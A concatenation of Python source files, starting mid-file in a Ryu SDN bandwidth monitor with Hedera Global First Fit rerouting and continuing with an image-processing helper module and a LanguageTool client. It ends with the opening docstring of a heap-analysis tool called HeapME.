dpid = ev.msg.datapath.id
self.stats['port'][dpid] = body
self.free_bandwidth.setdefault(dpid, {})
for stat in sorted(body, key=attrgetter('port_no')):
port_no = stat.port_no
if port_no != ofproto_v1_3.OFPP_LOCAL:
key = (dpid, port_no)
value = (stat.tx_bytes, stat.rx_bytes, stat.rx_errors,
stat.duration_sec, stat.duration_nsec)
self._save_stats(self.port_stats, key, value, 5)
# Get port speed and Save it.
pre = 0
period = setting.MONITOR_PERIOD
tmp = self.port_stats[key]
if len(tmp) > 1:
# Calculate only the tx_bytes, not the rx_bytes. (hmc)
pre = tmp[-2][0]
period = self._get_period(tmp[-1][3], tmp[-1][4], tmp[-2][3], tmp[-2][4])
speed = self._get_speed(self.port_stats[key][-1][0], pre, period)
self._save_stats(self.port_speed, key, speed, 5)
self._save_freebandwidth(dpid, port_no, speed)
@set_ev_cls(ofp_event.EventOFPPortDescStatsReply, MAIN_DISPATCHER)
def port_desc_stats_reply_handler(self, ev):
"""
Save port description info.
"""
msg = ev.msg
dpid = msg.datapath.id
ofproto = msg.datapath.ofproto
config_dict = {ofproto.OFPPC_PORT_DOWN: "Down",
ofproto.OFPPC_NO_RECV: "No Recv",
ofproto.OFPPC_NO_FWD: "No Farward",
ofproto.OFPPC_NO_PACKET_IN: "No Packet-in"}
state_dict = {ofproto.OFPPS_LINK_DOWN: "Down",
ofproto.OFPPS_BLOCKED: "Blocked",
ofproto.OFPPS_LIVE: "Live"}
ports = []
for p in ev.msg.body:
ports.append('port_no=%d hw_addr=%s name=%s config=0x%08x '
'state=0x%08x curr=0x%08x advertised=0x%08x '
'supported=0x%08x peer=0x%08x curr_speed=%d '
'max_speed=%d' %
(p.port_no, p.hw_addr,
p.name, p.config,
p.state, p.curr, p.advertised,
p.supported, p.peer, p.curr_speed,
p.max_speed))
if p.config in config_dict:
config = config_dict[p.config]
else:
config = "up"
if p.state in state_dict:
state = state_dict[p.state]
else:
state = "up"
# Recording data.
port_feature = (config, state, p.curr_speed)
self.port_features[dpid][p.port_no] = port_feature
@set_ev_cls(ofp_event.EventOFPPortStatus, MAIN_DISPATCHER)
def _port_status_handler(self, ev):
"""
Handle the port status changed event.
"""
msg = ev.msg
ofproto = msg.datapath.ofproto
reason = msg.reason
dpid = msg.datapath.id
port_no = msg.desc.port_no
reason_dict = {ofproto.OFPPR_ADD: "added",
ofproto.OFPPR_DELETE: "deleted",
ofproto.OFPPR_MODIFY: "modified", }
if reason in reason_dict:
print "switch%d: port %s %s" % (dpid, reason_dict[reason], port_no)
else:
print "switch%d: Illeagal port state %s %s" % (dpid, port_no, reason)
@set_ev_cls(ofp_event.EventOFPFlowStatsReply, MAIN_DISPATCHER)
def _flow_stats_reply_handler(self, ev):
"""
Save flow stats reply information into self.flow_stats.
Calculate flow speed and Save it.
(old) self.flow_stats = {dpid:{(in_port, ipv4_dst, out-port):[(packet_count, byte_count, duration_sec, duration_nsec),],},}
(old) self.flow_speed = {dpid:{(in_port, ipv4_dst, out-port):[speed,],},}
(new) self.flow_stats = {dpid:{(priority, ipv4_src, ipv4_dst):[(packet_count, byte_count, duration_sec, duration_nsec),],},}
(new) self.flow_speed = {dpid:{(priority, ipv4_src, ipv4_dst):[speed,],},}
Because the proactive flow entrys don't have 'in_port' and 'out-port' field.
Note: table-miss, LLDP and ARP flow entries are not what we need, just filter them.
"""
body = ev.msg.body
dpid = ev.msg.datapath.id
self.statRecord.append(dpid)
self.stats['flow'][dpid] = body
self.flow_stats.setdefault(dpid, {})
self.flow_speed.setdefault(dpid, {})
for stat in sorted([flow for flow in body if ((flow.priority not in [0, 65535]) and (flow.match.get('ipv4_src')) and (flow.match.get('ipv4_dst')))],
key=lambda flow: (flow.priority, flow.match.get('ipv4_src'), flow.match.get('ipv4_dst'))):
key = (stat.priority, stat.match.get('ipv4_src'), stat.match.get('ipv4_dst'))
value = (stat.packet_count, stat.byte_count,
stat.duration_sec, stat.duration_nsec)
self._save_stats(self.flow_stats[dpid], key, value, 5)
# Get flow's speed and Save it.
pre = 0
period = setting.MONITOR_PERIOD
tmp = self.flow_stats[dpid][key]
if len(tmp) > 1:
pre = tmp[-2][1]
period = self._get_period(tmp[-1][2], tmp[-1][3], tmp[-2][2], tmp[-2][3])
speed = self._get_speed(self.flow_stats[dpid][key][-1][1], pre, period)
self._save_stats(self.flow_speed[dpid], key, speed, 5)
# Record flows that need to be rescheduled. (hmc)
flowDemand = speed * 8.0 / (setting.MAX_CAPACITY * 1000)
src = stat.match['ipv4_src']
dst = stat.match['ipv4_dst']
if flowDemand > 0.1:
if src not in self.hostsList:
self.hostsList.append(src)
if dst not in self.hostsList:
self.hostsList.append(dst)
self.flows.append({'src': src, 'dst': dst, 'demand': flowDemand,
'converged':False, 'receiver_limited': False,
'match': stat.match, 'priority': stat.priority})
if not self.pre_GFF_path.has_key((src, dst)):
self.pre_GFF_path[(src, dst)] = None
else:
pass
# Estimate flows' demands if all the flow_stat replies are received.
if len(self.statRecord) == 1.25 * (CONF.fanout ** 2) and self.flows:
flows = sorted([flow for flow in self.flows], key=lambda flow: (flow['src'], flow['dst']))
self.flows=[]
hostsList = sorted(self.hostsList)
self._demandEstimator(flows, hostsList)
else:
pass
def _demandEstimator(self, flows, hostsList):
'''
Estimate flows' demands.
'''
estimated_flows = demand_estimation(flows, hostsList)
for flow in estimated_flows:
if flow['demand'] > 0.1:
# Thread(target=self._GlobalFirstFit,args=(flow,)).start()
self._GlobalFirstFit(flow)
# self._GlobalFirstFit(flow)
def _GlobalFirstFit(self, flow):
'''
Do the Hedera Global First Fit here.
self.awareness.link_to_port = {(src_dpid,dst_dpid):(src_port,dst_port),}
self.free_bandwidth = {dpid:{port_no:free_bw,},} Unit:Kbit/s
'''
src_dp = self.awareness.get_host_location(flow['src'])[0]
dst_dp = self.awareness.get_host_location(flow['dst'])[0]
paths = self.awareness.shortest_paths.get(src_dp).get(dst_dp)
GFF_route = None
for path in paths:
fitCheck = True
for i in xrange(len(path) - 1):
fitCheck = False
if self.awareness.link_to_port.has_key((path[i], path[i+1])):
src_port = self.awareness.link_to_port[(path[i], path[i+1])][0]
if self.free_bandwidth.has_key(path[i]) and self.free_bandwidth[path[i]].has_key(src_port):
if (self.free_bandwidth[path[i]][src_port] / setting.MAX_CAPACITY) < flow['demand']:
break
else:
fitCheck = True
if fitCheck == True:
GFF_route = path
# self.logger.info("[GFF PATH]%s<-->%s: %s" % (flow['src'], flow['dst'], path))
break
if GFF_route:
# Install new GFF_path flow entries.
# self.logger.info("[GFF INSTALLING]%s<-->%s: %s" % (flow['src'], flow['dst'], path))
self. _install_GFF_path(GFF_route, flow['match'], flow['priority'],flow['src'])
def _install_GFF_path(self, GFF_route, match, priority,ip_dst):
'''
Installing the Global First Fit path.
"match": {"dl_type": 2048, "in_port": 3,
"ipv4_src": "10.1.0.1", "ipv4_dst": "10.8.0.2"}
flow_info = (eth_type, src_ip, dst_ip, priority)
'''
flow_info = (match['eth_type'], match['ipv4_src'], match['ipv4_dst'], priority)
# Install flow entries to datapaths along the path.
self.install_flow(self.datapaths, self.awareness.link_to_port, GFF_route, ip_dst,flow_info)
def install_flow(self, datapaths, link_to_port, path, ip_dst,flow_info):
'''
Install flow entries for datapaths.
path=[dpid1, dpid2, ...]
flow_info = (eth_type, src_ip, dst_ip, priority)
self.awareness.access_table = {(sw,port):(ip, mac),}
'''
Pathlen = len(path)
if Pathlen == 0:
self.logger.info("Path error!")
return
in_port = flow_info[3]
first_dp = datapaths[path[0]]
port_pair = self.get_port_pair_from_link(link_to_port, path[0], path[1])
# install flow entry of the second switch to the last switch
for i in xrange(1, Pathlen - 1):
port = self.get_port_pair_from_link(link_to_port, path[i - 1], path[i])
if (i < Pathlen - 1):
port_next = self.get_port_pair_from_link(link_to_port, path[i], path[i + 1])
else:
port_next = self.awareness.get_host_location(ip_dst)[1]
if port and port_next:
src_port = port[1]
if (i < Pathlen - 1):
dst_port = port_next[0]
else:
dst_port = port_next
datapath = datapaths[path[i]]
self.send_flow_mod(datapath, flow_info, src_port, dst_port)
if port_pair is None:
self.logger.info("Port not found in first hop.")
return
out_port = port_pair[0]
self.send_flow_mod(first_dp, flow_info, in_port, out_port)
def get_port_pair_from_link(self, link_to_port, src_dpid, dst_dpid):
"""
Get port pair of link, so that controller can install flow entry.
link_to_port = {(src_dpid,dst_dpid):(src_port,dst_port),}
"""
if (src_dpid, dst_dpid) in link_to_port:
return link_to_port[(src_dpid, dst_dpid)]
else:
self.logger.info("Link from dpid:%s to dpid:%s is not in links" %
(src_dpid, dst_dpid))
return None
def send_flow_mod(self, datapath, flow_info, src_port, dst_port):
"""
Build flow entry, and send it to datapath.
flow_info = (eth_type, src_ip, dst_ip, priority)
"""
parser = datapath.ofproto_parser
actions = []
actions.append(parser.OFPActionOutput(dst_port))
if len(flow_info) == 7:
if flow_info[-3] == 6:
if flow_info[-2] == 'src':
match = parser.OFPMatch(
in_port=src_port, eth_type=flow_info[0],
ipv4_src=flow_info[1], ipv4_dst=flow_info[2],
ip_proto=6, tcp_src=flow_info[-1])
elif flow_info[-2] == 'dst':
match = parser.OFPMatch(
in_port=src_port, eth_type=flow_info[0],
ipv4_src=flow_info[1], ipv4_dst=flow_info[2],
ip_proto=6, tcp_dst=flow_info[-1])
else:
pass
elif flow_info[-3] == 17:
if flow_info[-2] == 'src':
match = parser.OFPMatch(
in_port=src_port, eth_type=flow_info[0],
ipv4_src=flow_info[1], ipv4_dst=flow_info[2],
ip_proto=17, udp_src=flow_info[-1])
elif flow_info[-2] == 'dst':
match = parser.OFPMatch(
in_port=src_port, eth_type=flow_info[0],
ipv4_src=flow_info[1], ipv4_dst=flow_info[2],
ip_proto=17, udp_dst=flow_info[-1])
else:
pass
elif len(flow_info) == 4:
match = parser.OFPMatch(
in_port=src_port, eth_type=flow_info[0],
ipv4_src=flow_info[1], ipv4_dst=flow_info[2])
else:
pass
priority = flow_info[3] + 1
self.add_flow(datapath, priority, match, actions,
idle_timeout=1, hard_timeout=0)
def add_flow(self, dp, priority, match, actions, idle_timeout=5, hard_timeout=60):
"""
Send a flow entry to datapath.
"""
ofproto = dp.ofproto
parser = dp.ofproto_parser
inst = [parser.OFPInstructionActions(ofproto.OFPIT_APPLY_ACTIONS, actions)]
mod = parser.OFPFlowMod(datapath=dp, priority=priority,
idle_timeout=idle_timeout,
hard_timeout=hard_timeout,
match=match, instructions=inst)
dp.send_msg(mod)
def _request_stats(self, datapath):
"""
Sending request msg to datapath
"""
self.logger.debug('send stats request: %016x', datapath.id)
ofproto = datapath.ofproto
parser = datapath.ofproto_parser
req = parser.OFPPortDescStatsRequest(datapath, 0)
datapath.send_msg(req)
req = parser.OFPPortStatsRequest(datapath, 0, ofproto.OFPP_ANY)
datapath.send_msg(req)
req = parser.OFPFlowStatsRequest(datapath)
datapath.send_msg(req)
def get_min_bw_of_links(self, graph, path, min_bw):
"""
Getting bandwidth of path. Actually, the mininum bandwidth
of links is the path's bandwith, because it is the bottleneck of path.
"""
_len = len(path)
if _len > 1:
minimal_band_width = min_bw
for i in xrange(_len-1):
pre, curr = path[i], path[i+1]
if 'bandwidth' in graph[pre][curr]:
bw = graph[pre][curr]['bandwidth']
minimal_band_width = min(bw, minimal_band_width)
else:
continue
return minimal_band_width
else:
return min_bw
def get_best_path_by_bw(self, graph, paths):
"""
Get best path by comparing paths.
Note: This function is called in EFattree module.
"""
capabilities = {}
best_paths = copy.deepcopy(paths)
for src in paths:
for dst in paths[src]:
if src == dst:
best_paths[src][src] = [src]
capabilities.setdefault(src, {src: setting.MAX_CAPACITY})
capabilities[src][src] = setting.MAX_CAPACITY
else:
max_bw_of_paths = 0
best_path = paths[src][dst][0]
for path in paths[src][dst]:
min_bw = setting.MAX_CAPACITY
min_bw = self.get_min_bw_of_links(graph, path, min_bw)
if min_bw > max_bw_of_paths:
max_bw_of_paths = min_bw
best_path = path
best_paths[src][dst] = best_path
capabilities.setdefault(src, {dst: max_bw_of_paths})
capabilities[src][dst] = max_bw_of_paths
# self.capabilities and self.best_paths have no actual utility in this module.
self.capabilities = capabilities
self.best_paths = best_paths
return capabilities, best_paths
def create_bw_graph(self, bw_dict):
"""
Save bandwidth data into networkx graph object.
"""
try:
graph = self.awareness.graph
link_to_port = self.awareness.link_to_port
for link in link_to_port:
(src_dpid, dst_dpid) = link
(src_port, dst_port) = link_to_port[link]
if src_dpid in bw_dict and dst_dpid in bw_dict:
bw_src = bw_dict[src_dpid][src_port]
bw_dst = bw_dict[dst_dpid][dst_port]
bandwidth = min(bw_src, bw_dst)
# Add key:value pair of bandwidth into graph.
if graph.has_edge(src_dpid, dst_dpid):
graph[src_dpid][dst_dpid]['bandwidth'] = bandwidth
# else:
# graph.add_edge(src_dpid, dst_dpid)
# graph[src_dpid][dst_dpid]['bandwidth'] = bandwidth
# else:
# if graph.has_edge(src_dpid, dst_dpid):
# graph[src_dpid][dst_dpid]['bandwidth'] = 0
# else:
# graph.add_edge(src_dpid, dst_dpid)
# graph[src_dpid][dst_dpid]['bandwidth'] = 0
return graph
except:
self.logger.info("Create bw graph exception")
if self.awareness is None:
self.awareness = lookup_service_brick('awareness')
return self.awareness.graph
def _save_freebandwidth(self, dpid, port_no, speed):
"""
Calculate free bandwidth of port and Save it.
port_feature = (config, state, p.curr_speed)
self.port_features[dpid][p.port_no] = port_feature
self.free_bandwidth = {dpid:{port_no:free_bw,},}
"""
port_state = self.port_features.get(dpid).get(port_no)
if port_state:
capacity = setting.MAX_CAPACITY # The true bandwidth of link, instead of 'curr_speed'.
free_bw = self._get_free_bw(capacity, speed)
self.free_bandwidth[dpid].setdefault(port_no, None)
self.free_bandwidth[dpid][port_no] = free_bw
else:
self.logger.info("Port is Down")
def _save_stats(self, _dict, key, value, length=5):
if key not in _dict:
_dict[key] = []
_dict[key].append(value)
if len(_dict[key]) > length:
_dict[key].pop(0)
def _get_speed(self, now, pre, period):
if period:
return (now - pre) / (period)
else:
return 0
def _get_free_bw(self, capacity, speed):
# freebw: Kbit/s
return max(capacity - speed * 8 / 1000.0, 0)
def _get_time(self, sec, nsec):
return sec + nsec / 1000000000.0
def _get_period(self, n_sec, n_nsec, p_sec, p_nsec):
return self._get_time(n_sec, n_nsec) - self._get_time(p_sec, p_nsec)
def show_stat(self, _type):
'''
Show statistics information according to data type.
_type: 'port' / 'flow'
'''
if setting.TOSHOW is False:
return
bodys = self.stats[_type]
if _type == 'flow':
print('\ndatapath '
'priority ip_src ip_dst '
' packets bytes flow-speed(Kb/s)')
print('-------- '
'-------- ------------ ------------ '
'--------- ----------- ----------------')
for dpid in sorted(bodys.keys()):
for stat in sorted([flow for flow in bodys[dpid] if ((flow.priority not in [0, 65535]) and (flow.match.get('ipv4_src')) and (flow.match.get('ipv4_dst')))],
key=lambda flow: (flow.priority, flow.match.get('ipv4_src'), flow.match.get('ipv4_dst'))):
print('%8d %8s %12s %12s %9d %11d %16.1f' % (
dpid,
stat.priority, stat.match.get('ipv4_src'), stat.match.get('ipv4_dst'),
stat.packet_count, stat.byte_count,
abs(self.flow_speed[dpid][(stat.priority, stat.match.get('ipv4_src'), stat.match.get('ipv4_dst'))][-1])*8/1000.0))
print
if _type == 'port':
print('\ndatapath port '
' rx-pkts rx-bytes '' tx-pkts tx-bytes '
' port-bw(Kb/s) port-speed(b/s) port-freebw(Kb/s) '
' port-state link-state')
print('-------- ---- '
'--------- ----------- ''--------- ----------- '
'------------- --------------- ----------------- '
'---------- ----------')
_format = '%8d %4x %9d %11d %9d %11d %13d %15.1f %17.1f %10s %10s'
for dpid in sorted(bodys.keys()):
for stat in sorted(bodys[dpid], key=attrgetter('port_no')):
if stat.port_no != ofproto_v1_3.OFPP_LOCAL:
print(_format % (
dpid, stat.port_no,
stat.rx_packets, stat.rx_bytes,
stat.tx_packets, stat.tx_bytes,
setting.MAX_CAPACITY,
abs(self.port_speed[(dpid, stat.port_no)][-1] * 8),
self.free_bandwidth[dpid][stat.port_no],
self.port_features[dpid][stat.port_no][0],
self.port_features[dpid][stat.port_no][1]))
print
|
imagetools.py
|
# -*- coding=UTF-8 -*-
# pyright: strict
"""tools for image processing. """
import hashlib
import threading
from pathlib import Path
from typing import Any, Callable, Dict, Literal, Optional, Text, Tuple, Union
import cast_unknown as cast
import cv2
import cv2.img_hash
import numpy as np
from PIL.Image import BICUBIC, Image, fromarray
def md5(b_img: np.ndarray, *, save_path: Optional[Text] = None) -> Text:
_id = hashlib.md5(b_img.tobytes()).hexdigest()
if save_path:
dst = Path(save_path) / _id[0] / _id[1:3] / (_id[3:] + ".png")
if not dst.exists():
dst.parent.mkdir(parents=True, exist_ok=True)
fromarray(b_img).convert("1").save(dst)
return _id
_HASH_ALGORITHM = cv2.img_hash.BlockMeanHash_create()
def image_hash(img: Image, *, save_path: Optional[Text] = None) -> Text:
cv_img = np.asarray(img.convert("L"))
h = _HASH_ALGORITHM.compute(cv_img).tobytes().hex()
if save_path:
md5_hash = hashlib.md5(img.tobytes()).hexdigest()
dst = Path(save_path) / h[0] / h[1:3] / h[3:] / (md5_hash + ".png")
if not dst.exists():
dst.parent.mkdir(parents=True, exist_ok=True)
img.convert("RGB").save(dst)
return h
def compare_hash(a: Text, b: Text) -> float:
if a == b:
return 1.0
cv_a = np.array(list(bytes.fromhex(a)), np.uint8)
cv_b = np.array(list(bytes.fromhex(b)), np.uint8)
res = _HASH_ALGORITHM.compare(cv_a, cv_b)
return 1 - (res / (len(a) * 2))
def _cast_float(v: Any) -> float:
return float(v)
def cv_image(img: Image) -> np.ndarray:
if img.mode == "RGB":
return cv2.cvtColor(np.asarray(img), cv2.COLOR_RGB2BGR)
if img.mode == "L":
return np.array(img)
raise ValueError("cv_image: unsupported mode: %s" % img.mode)
def pil_image(img: np.ndarray) -> Image:
if img.shape[2:] == (3,):
return fromarray(cv2.cvtColor(img, cv2.COLOR_BGR2RGB))
return fromarray(img)
def compare_color(
a: Union[Tuple[int, ...], int], b: Union[Tuple[int, ...], int], *, bit_size: int = 8
) -> float:
max_value = (1 << bit_size) - 1
t_a = tuple(cast.list_(a, (int,)))
t_b = tuple(cast.list_(b, (int,)))
if len(t_a) != len(t_b):
return 0
return max(
1
- _cast_float(
np.sqrt(_cast_float(np.sum((np.array(t_a) - np.array(t_b)) ** 2, axis=0)))
)
/ max_value,
0,
)
def level(
img: np.ndarray, black: np.ndarray, white: np.ndarray, *, bit_size: int = 8
) -> np.ndarray:
max_value = (1 << bit_size) - 1
return np.clip((img - black) / (white - black) * max_value, 0, max_value).astype(
img.dtype
)
def color_key(
img: np.ndarray, color: np.ndarray, threshold: float = 0.8, bit_size: int = 8
) -> np.ndarray:
max_value = (1 << bit_size) - 1
assert img.shape == color.shape, (img.shape, color.shape)
if len(img.shape) == 2:
img = img[..., np.newaxis]
color = color[..., np.newaxis]
# do this is somehow faster than
# `numpy.linalg.norm(img.astype(int) - color.astype(int), axis=2,).clip(0, 255).astype(np.uint8)`
diff_img = (
np.asarray(
np.sqrt(
np.asarray(np.sum((img.astype(int) - color.astype(int)) ** 2, axis=2))
)
)
.clip(0, 255)
.astype(img.dtype)
)
ret = max_value - diff_img
if threshold > 0:
mask_img = (ret > (max_value * threshold)).astype(img.dtype)
ret *= mask_img
ret = ret.clip(0, 255)
ret = ret.astype(img.dtype)
return ret
def constant_color_key(
img: np.ndarray, *colors: Tuple[int, ...], threshold: float = 0.8, bit_size: int = 8
) -> np.ndarray:
ret = np.zeros(img.shape[:2], dtype=img.dtype)
for color in colors:
match_img = color_key(
img, np.full_like(img, color), threshold=threshold, bit_size=bit_size
)
ret = np.array(np.maximum(ret, match_img))
return ret
def sharpen(img: np.ndarray, size: int = 1, *, bit_size: int = 8) -> np.ndarray:
return cv2.filter2D(
img, bit_size, np.array(((-1, -1, -1), (-1, 9, -1), (-1, -1, -1))) * size
)
def mix(a: np.ndarray, b: np.ndarray, a_mix: float) -> np.ndarray:
total_ratio = 10000
a_ratio = int(a_mix * total_ratio)
b_ratio = total_ratio - a_ratio
return ((a.astype(int) * a_ratio + b.astype(int) * b_ratio) / total_ratio).astype(
a.dtype
)
def border_flood_fill(
cv_img: np.ndarray, color: Tuple[int, ...] = (255,)
) -> np.ndarray:
h, w = cv_img.shape[:2]
border_points = (
*((0, i) for i in range(h)),
*((i, 0) for i in range(w)),
*((w - 1, i) for i in range(h)),
*((i, h - 1) for i in range(w)),
)
fill_mask_img = cv2.copyMakeBorder(cv_img, 1, 1, 1, 1, cv2.BORDER_CONSTANT)
bg_mask_img = np.zeros_like(cv_img)
for i in border_points:
x, y = i
if cv_img[y, x] != 0:
continue
cv2.floodFill(bg_mask_img, fill_mask_img, (x, y), color, 0, 0)
return bg_mask_img
def bg_mask_by_outline(outline_img: np.ndarray) -> np.ndarray:
return border_flood_fill(outline_img)
def resize(
img: Image,
*,
height: Optional[int] = None,
width: Optional[int] = None,
resample: int = BICUBIC,
) -> Image:
if height and width:
return img.resize((width, height), resample=resample)
w, h = img.width, img.height
if height:
w = round(height * (w / h))
h = height
elif width:
h = round(width * (h / w))
w = width
return img.resize((w, h), resample=resample)
def fill_area(
img: np.ndarray,
color: Tuple[int, ...],
*,
mode: int = cv2.RETR_EXTERNAL,
size_lt: int,
):
contours, _ = cv2.findContours(
(img * 255).astype(np.uint8), mode, cv2.CHAIN_APPROX_NONE
)
for i in contours:
size = cv2.contourArea(i)
if size < size_lt:
cv2.drawContours(img, [i], -1, color, cv2.FILLED)
_WINDOW_ID: Dict[Literal["value"], int] = {"value": 0}
def show(img: Image, title: Text = "") -> Callable[[], None]:
stop_event = threading.Event()
stop_event.is_set()
_WINDOW_ID["value"] += 1
title = f"{title} - {_WINDOW_ID['value']}"
def _run():
cv_img = np.asarray(img)
try:
cv2.imshow(title, cv_img)
while not stop_event.is_set() and cv2.getWindowProperty(title, 0) >= 0:
if cv2.pollKey() == "q":
break
finally:
cv2.destroyWindow(title)
t = threading.Thread(target=_run, daemon=True)
t.start()
def _close():
stop_event.set()
t.join()
return _close
|
server.py
|
import atexit
import http.client
import json
import re
import socket
import threading
import urllib.parse
from weakref import WeakValueDictionary
from .download_lt import download_lt
from .language_tag import LanguageTag
from .match import Match
from .utils import *
DEBUG_MODE = False
# Keep track of running server PIDs in a global list. This way,
# we can ensure they're killed on exit.
RUNNING_SERVER_PROCESSES = []
class LanguageTool:
""" Main class used for checking text against different rules.
LanguageTool v2 API documentation: https://languagetool.org/http-api/swagger-ui/#!/default/post_check
"""
_HOST = socket.gethostbyname('localhost')
_MIN_PORT = 8081
_MAX_PORT = 8999
_TIMEOUT = 5 * 60
_remote = False
_port = _MIN_PORT
_server = None
_consumer_thread = None
_instances = WeakValueDictionary()
_PORT_RE = re.compile(r"(?:https?://.*:|port\s+)(\d+)", re.I)
def __init__(self, language=None, motherTongue=None, remote_server=None, newSpellings=None, new_spellings_persist=True):
self._new_spellings = None
self._new_spellings_persist = new_spellings_persist
if remote_server is not None:
self._remote = True
self._url = parse_url(remote_server)
self._url = urllib.parse.urljoin(self._url, 'v2/')
self._update_remote_server_config(self._url)
elif not self._server_is_alive():
self._start_server_on_free_port()
if language is None:
try:
language = get_locale_language()
except ValueError:
language = FAILSAFE_LANGUAGE
if newSpellings:
self._new_spellings = newSpellings
self._register_spellings(self._new_spellings)
self._language = LanguageTag(language, self._get_languages())
self.motherTongue = motherTongue
self.disabled_rules = set()
self.enabled_rules = set()
self.disabled_categories = set()
self.enabled_categories = set()
self.enabled_rules_only = False
self._instances[id(self)] = self
def __enter__(self):
return self
def __exit__(self, exc_type, exc_val, exc_tb):
self.close()
def __repr__(self):
return '{}(language={!r}, motherTongue={!r})'.format(
self.__class__.__name__, self.language, self.motherTongue)
def close(self):
if not self._instances and self._server_is_alive():
self._terminate_server()
if not self._new_spellings_persist and self._new_spellings:
self._unregister_spellings()
self._new_spellings = []
@property
def language(self):
"""The language to be used."""
return self._language
@language.setter
def language(self, language):
self._language = LanguageTag(language, self._get_languages())
self.disabled_rules.clear()
self.enabled_rules.clear()
@property
def motherTongue(self):
"""The user's mother tongue or None.
The mother tongue may also be used as a source language for
checking bilingual texts.
"""
return self._motherTongue
@motherTongue.setter
def motherTongue(self, motherTongue):
self._motherTongue = (None if motherTongue is None
else LanguageTag(motherTongue, self._get_languages()))
@property
def _spell_checking_categories(self):
return {'TYPOS'}
def check(self, text: str) -> [Match]:
"""Match text against enabled rules."""
url = urllib.parse.urljoin(self._url, 'check')
response = self._query_server(url, self._encode(text))
matches = response['matches']
return [Match(match) for match in matches]
def _encode(self, text):
params = {'language': self.language, 'text': text.encode('utf-8')}
if self.motherTongue is not None:
params['motherTongue'] = self.motherTongue
if self.disabled_rules:
params['disabledRules'] = ','.join(self.disabled_rules)
if self.enabled_rules:
params['enabledRules'] = ','.join(self.enabled_rules)
if self.enabled_rules_only:
params['enabledOnly'] = 'true'
if self.disabled_categories:
params['disabledCategories'] = ','.join(self.disabled_categories)
if self.enabled_categories:
params['enabledCategories'] = ','.join(self.enabled_categories)
return urllib.parse.urlencode(params).encode()
def correct(self, text: str) -> str:
"""Automatically apply suggestions to the text."""
return correct(text, self.check(text))
def enable_spellchecking(self):
"""Enable spell-checking rules."""
self.disabled_categories.difference_update(self._spell_checking_categories)
def disable_spellchecking(self):
"""Disable spell-checking rules."""
self.disabled_categories.update(self._spell_checking_categories)
@staticmethod
def _get_valid_spelling_file_path() -> str:
library_path = get_language_tool_directory()
spelling_file_path = os.path.join(library_path, "org/languagetool/resource/en/hunspell/spelling.txt")
if not os.path.exists(spelling_file_path):
raise FileNotFoundError("Failed to find the spellings file at {}\n Please file an issue at "
"https://github.com/jxmorris12/language_tool_python/issues"
.format(spelling_file_path))
return spelling_file_path
def _register_spellings(self, spellings):
spelling_file_path = self._get_valid_spelling_file_path()
with open(spelling_file_path, "a+") as spellings_file:
spellings_file.write("\n" + "\n".join([word for word in spellings]))
if DEBUG_MODE:
print("Registered new spellings at {}".format(spelling_file_path))
def _unregister_spellings(self):
spelling_file_path = self._get_valid_spelling_file_path()
with open(spelling_file_path, 'r+') as spellings_file:
spellings_file.seek(0, os.SEEK_END)
for _ in range(len(self._new_spellings)):
while spellings_file.read(1) != '\n':
spellings_file.seek(spellings_file.tell() - 2, os.SEEK_SET)
spellings_file.seek(spellings_file.tell() - 2, os.SEEK_SET)
spellings_file.seek(spellings_file.tell() + 1, os.SEEK_SET)
spellings_file.truncate()
if DEBUG_MODE:
print("Unregistered new spellings at {}".format(spelling_file_path))
def _get_languages(self) -> set:
"""Get supported languages (by querying the server)."""
self._start_server_if_needed()
url = urllib.parse.urljoin(self._url, 'languages')
languages = set()
for e in self._query_server(url, num_tries=1):
languages.add(e.get('code'))
languages.add(e.get('longCode'))
return languages
def _start_server_if_needed(self):
# Start server.
if not self._server_is_alive() and self._remote is False:
self._start_server_on_free_port()
def _update_remote_server_config(self, url):
self._url = url
self._remote = True
def _query_server(self, url, data=None, num_tries=2):
if DEBUG_MODE:
print('_query_server url:', url, 'data:', data)
for n in range(num_tries):
try:
with urlopen(url, data, self._TIMEOUT) as f:
raw_data = f.read().decode('utf-8')
try:
return json.loads(raw_data)
except json.decoder.JSONDecodeError as e:
print('URL {url} and data {data} returned invalid JSON response:')
print(raw_data)
raise e
except (IOError, http.client.HTTPException) as e:
if self._remote is False:
self._terminate_server()
self._start_local_server()
if n + 1 >= num_tries:
raise LanguageToolError('{}: {}'.format(self._url, e))
def _start_server_on_free_port(self):
while True:
self._url = 'http://{}:{}/v2/'.format(self._HOST, self._port)
try:
self._start_local_server()
break
except ServerError:
if self._MIN_PORT <= self._port < self._MAX_PORT:
self._port += 1
else:
raise
def _start_local_server(self):
# Before starting local server, download language tool if needed.
download_lt()
err = None
try:
server_cmd = get_server_cmd(self._port)
except PathError as e:
# Can't find path to LanguageTool.
err = e
else:
# Need to PIPE all handles: http://bugs.python.org/issue3905
self._server = subprocess.Popen(
server_cmd,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
universal_newlines=True,
startupinfo=startupinfo
)
global RUNNING_SERVER_PROCESSES
RUNNING_SERVER_PROCESSES.append(self._server)
match = None
while True:
line = self._server.stdout.readline()
if not line:
break
match = self._PORT_RE.search(line)
if match:
port = int(match.group(1))
if port != self._port:
raise LanguageToolError('requested port {}, but got {}'.format(
self._port, port))
break
if not match:
err_msg = self._terminate_server()
match = self._PORT_RE.search(err_msg)
if not match:
raise LanguageToolError(err_msg)
port = int(match.group(1))
if port != self._port:
raise LanguageToolError(err_msg)
if self._server:
self._consumer_thread = threading.Thread(
target=lambda: _consume(self._server.stdout))
self._consumer_thread.daemon = True
self._consumer_thread.start()
else:
# Couldn't start the server, so maybe there is already one running.
raise ServerError('Server running; don\'t start a server here.')
def _server_is_alive(self):
return self._server and self._server.poll() is None
def _terminate_server(self):
LanguageToolError_message = ''
try:
self._server.terminate()
except OSError:
pass
try:
LanguageToolError_message = self._server.communicate()[1].strip()
except (IOError, ValueError):
pass
try:
self._server.stdout.close()
except IOError:
pass
try:
self._server.stdin.close()
except IOError:
pass
try:
self._server.stderr.close()
except IOError:
pass
self._server = None
return LanguageToolError_message
class LanguageToolPublicAPI(LanguageTool):
""" Language tool client of the official API. """
def __init__(self, *args, **kwargs):
super().__init__(*args, remote_server='https://languagetool.org/api/', **kwargs)
@atexit.register
def terminate_server():
"""Terminate the server."""
for proc in RUNNING_SERVER_PROCESSES:
proc.terminate()
def _consume(stdout):
"""Consume/ignore the rest of the server output.
Without this, the server will end up hanging due to the buffer
filling up.
"""
while stdout.readline():
pass
|
heapme.py
|
"""
Heap Made Easy - Heap Analysis and Collaboration Tool
https://heapme.f2tc.com/
HeapME is a tool that helps simplify heap analysis and collaboration through an intuitive web interface.
Features:
